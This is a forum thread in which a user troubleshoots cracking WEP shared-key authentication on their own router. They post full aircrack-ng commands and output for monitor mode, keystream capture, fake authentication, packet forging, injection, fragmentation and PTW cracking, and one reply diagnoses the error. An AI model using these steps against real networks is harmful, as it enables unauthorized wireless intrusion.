Results 1 to 3 of 3

Thread: WEP _SKA_Got Low IVS rate

  1. #1
    Junior Member
    Join Date
    Jul 2009
    Posts
    27

    Default WEP _SKA_Got Low IVS rate

    Helo for everybody, I have a problem with IVs, I will try to explain what I did.
    I set my router to use WEP SKA key in ASCII format, the key is “77777”
    I used BT4-pr in order to obtain it via aircrack, first of all there is
    general overview of my steps:
    1. Put card to monitor mode (Intel 5100)
    2. Dump shared key PRGA
    3. Associate with AP
    4. Inject packets with fragmentation attack, (packets were injected, about 60000 but only 1 IV received )
    5. Recover shared key
    I stuck in obtaining IVS I got only 1, but packets were injected successfully.
    Code:
    1.
    root@track-laptop:~# airmon-ng start wlan0
    
    
    Interface	Chipset		Driver
    
    wlan0		Intel 4965/5xxx	iwlagn - [phy0]
    				(monitor mode enabled on mon0)
    
    root@track-laptop:~# iwconfig
    lo        no wireless extensions.
    
    eth0      no wireless extensions.
    
    wmaster0  no wireless extensions.
    
    wlan0     IEEE 802.11abgn  ESSID:""  
              Mode:Managed  Frequency:2.437 GHz  Access Point: Not-Associated   
              Tx-Power=15 dBm   
              Retry min limit:7   RTS thr:off   Fragment thr=2352 B   
              Encryption key:off
              Power Management:off
              Link Quality:0  Signal level:0  Noise level:0
              Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
              Tx excessive retries:0  Invalid misc:0   Missed beacon:0
    
    mon0      IEEE 802.11abgn  Mode:Monitor  Frequency:2.437 GHz  Tx-Power=15 dBm   
              Retry min limit:7   RTS thr:off   Fragment thr=2352 B   
              Encryption key:off
              Power Management:off
              Link Quality:0  Signal level:0  Noise level:0
              Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
              Tx excessive retries:0  Invalid misc:0   Missed beacon:0
    
              
    root@track-laptop:~# ifconfig
    lo        Link encap:Local Loopback  
              inet addr:127.0.0.1  Mask:255.0.0.0
              inet6 addr: ::1/128 Scope:Host
              UP LOOPBACK RUNNING  MTU:16436  Metric:1
              RX packets:100 errors:0 dropped:0 overruns:0 frame:0
              TX packets:100 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0 
              RX bytes:5000 (5.0 KB)  TX bytes:5000 (5.0 KB)
    
    mon0      Link encap:UNSPEC  HWaddr 00-21-6B-11-16-F2-30-30-00-00-00-00-00-00-00-00  
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:2303 errors:0 dropped:0 overruns:0 frame:0
              TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000 
              RX bytes:175264 (175.2 KB)  TX bytes:0 (0.0 B)
    
    wmaster0  Link encap:UNSPEC  HWaddr 00-21-6B-11-16-F2-00-00-00-00-00-00-00-00-00-00  
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:0 errors:0 dropped:0 overruns:0 frame:0
              TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000 
              RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
    Here is my target network:
    Code:
    root@track-laptop:~# airodump-ng mon0
    
    
    
    CH  6 ][ Elapsed: 8 s ][ 2009-07-19 13:39                                         
                                                                                                     
     BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                  
                                                                                                     
     
     00:19:E0:79:F7:26  -29       21        0    0   6  54 . WEP  WEP         OCEAN                  
                                                                                                     
     BSSID              STATION            PWR   Rate    Lost  Packets  Probes
    2. Dumping shared PRGA key, here I connected one wireless client
    Code:
    airodump-ng -c 6 --bssid 00:19:E0:79:F7:26 -w sharedkey mon0
    
     CH  6 ][ Elapsed: 1 min ][ 2009-07-19 13:43 ][ 140 bytes keystream: 00:19:E0:79:F7:26           
                                                                                                     
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID              
                                                                                                     
     00:19:E0:79:F7:26  -19   3      750       34    0   6  54 . WEP  WEP    SKA  OCEAN              
                                                                                                     
     BSSID              STATION            PWR   Rate    Lost  Packets  Probes                       
                                                                                                     
     00:19:E0:79:F7:26  00:1E:3D:BC:38:4E  -30   54 - 2      0       41
    3. Associating with AP
    Code:
    root@track-laptop:~# aireplay-ng -1 0 -e OCEAN -y sharedkey-01-00-19-E0-79-F7-26.xor -a 00:19:E0:79:F7:26 -h 00-21-6B-11-16-F2 mon0
    13:47:22  Waiting for beacon frame (BSSID: 00:19:E0:79:F7:26) on channel 6
    
    
    13:47:32  Sending Authentication Request (Shared Key) [ACK]
    13:47:32  Authentication 1/2 successful
    13:47:32  Sending encrypted challenge. [ACK]
    13:47:32  Authentication 2/2 successful
    13:47:32  Sending Association Request [ACK]
    13:47:32  Association successful :-) (AID: 1)
    4.Injecting packets
    Code:
    root@track-laptop:~# packetforge-ng -0 -a 00:19:E0:79:F7:26 -h 00-21-6B-11-16-F2 -k 255.255.255.255 -l 255.255.255.255 -y sharedkey-01-00-19-E0-79-F7-26.xor -w arp-request
    Wrote packet to: arp-request
    
    airodump-ng -c 6 --bssid 00:19:E0:79:F7:26 -w capture mon0
    
    
    root@track-laptop:~# aireplay-ng -2 -r arp-request mon0
    No source MAC (-h) specified. Using the device MAC (00:21:6B:11:16:F2)
    
    
            Size: 68, FromDS: 0, ToDS: 1 (WEP)
    
                  BSSID  =  00:19:E0:79:F7:26
              Dest. MAC  =  FF:FF:FF:FF:FF:FF
             Source MAC  =  00:21:6B:11:16:F2
    
            0x0000:  0841 0201 0019 e079 f726 0021 6b11 16f2  .A.....y.&.!k...
            0x0010:  ffff ffff ffff 8001 000b fb00 3325 5636  ............3%V6
            0x0020:  65df 6b2d 8841 32ea fbb0 7617 d131 8e7e  e.k-.A2...v..1.~
            0x0030:  aa70 ae8e 18fb 2e52 3913 c7cf cb5e 37d7  .p.....R9....^7.
            0x0040:  b5e1 9558                                ...X
    
    Use this packet ? y
    
    Saving chosen packet in replay_src-0719-135536.cap
    You should also start airodump-ng to capture replies
    5. Recovering shared key, as shown only 1 IV available
    Code:
    root@track-laptop:~# aircrack-ng -b 00:19:E0:79:F7:26 capture*.cap
    Opening capture-01.cap
    Attack will be restarted every 5000 captured ivs.
    Starting PTW attack with 1 ivs.
    
    
    
    
                                     Aircrack-ng 1.0 rc3 r1552
    
    
                     [00:00:00] Tested 0 keys (got 1 IVs)
    
       KB    depth   byte(vote)
        0  255/256   FF(   0) 00(   0) 01(   0) 02(   0) 03(   0)
        1    0/  7   BF( 256) 00(   0) 01(   0) 02(   0) 03(   0)
        2    0/  1   87( 256) 00(   0) 01(   0) 02(   0) 03(   0)
        3    0/  3   0C( 256) 00(   0) 01(   0) 02(   0) 03(   0)
        4    0/  4   82( 256) 00(   0) 01(   0) 02(   0) 03(   0)
    
    Failed. Next try with 5000 IVs.
    ^C
    Quitting aircrack-ng...

  2. #2
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    6

    Default

    Hello,

    I am no expert but I believe you have gone wrong in step 4

    BSSID = 00:19:E0:79:F7:26
    Dest. MAC = FF:FF:FF:FF:FF:FF
    Source MAC = 00:21:6B:11:16:F2

    The Dest. Mac should not be FF:FF:FF:FF:FF:FF

    say no to choosing that packet until you have a real dest. mac. If not successful try to de-authenticated again.

    Hope this helps.

  3. #3
    Junior Member
    Join Date
    Jul 2009
    Posts
    27

    Default

    Here I forget about one important step! I didn't make fragmentation attack to obtain 1500 PRGA key. But I can't get it. Lack of assocciation? But fake authantication had been received in previous step.
    Code:
    root@track-laptop:~# aireplay-ng -5 -b 00:19:E0:79:F7:26 -h 00-21-6B-11-16-F2 -k 255.255.255.255 -l 255.255.255.255 mon0
    13:27:55  Waiting for beacon frame (BSSID: 00:19:E0:79:F7:26) on channel 6
    13:27:56  Waiting for a data packet...
    
    
            Size: 68, FromDS: 0, ToDS: 1 (WEP)
    
                  BSSID  =  00:19:E0:79:F7:26
              Dest. MAC  =  FF:FF:FF:FF:FF:FF
             Source MAC  =  00:1E:3D:BC:38:4E
    
            0x0000:  0841 d500 0019 e079 f726 001e 3dbc 384e  .A.....y.&..=.8N
            0x0010:  ffff ffff ffff d002 d33c 2400 b61a f1a3  .........<$.....
            0x0020:  17b4 123d d737 0f3a fcf7 8127 0da4 3ac4  ...=.7.:...'..:.
            0x0030:  7188 2148 0af4 d58e b76b 2fb8 a936 0df8  q.!H.....k/..6..
            0x0040:  3bcb ab8e                                ;...
    
    Use this packet ? y
    
    Saving chosen packet in replay_src-0721-132756.cap
    13:28:04  Data packet found!
    13:28:04  Sending fragmented packet
    13:28:05  No answer, repeating...
    13:28:05  Trying a LLC NULL packet
    13:28:05  Sending fragmented packet
    13:28:07  No answer, repeating...
    13:28:07  Sending fragmented packet
    13:28:08  No answer, repeating...
    13:28:08  Trying a LLC NULL packet
    13:28:08  Sending fragmented packet
    13:28:10  No answer, repeating...
    13:28:10  Sending fragmented packet
    13:28:11  No answer, repeating...
    13:28:11  Trying a LLC NULL packet
    13:28:11  Sending fragmented packet
    13:28:13  No answer, repeating...
    13:28:13  Sending fragmented packet
    13:28:14  No answer, repeating...
    13:28:14  Trying a LLC NULL packet
    13:28:14  Sending fragmented packet
    13:28:16  No answer, repeating...
    13:28:16  Sending fragmented packet
    13:28:17  No answer, repeating...
    13:28:17  Trying a LLC NULL packet
    13:28:17  Sending fragmented packet
    So, I tried Korek chop-chop, fragmentation these atacks no work. Then I used ARP request replay and interactive replay 0841, these allow to inject packets, but IVC doesn't increase. Is it card issue or something else?

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •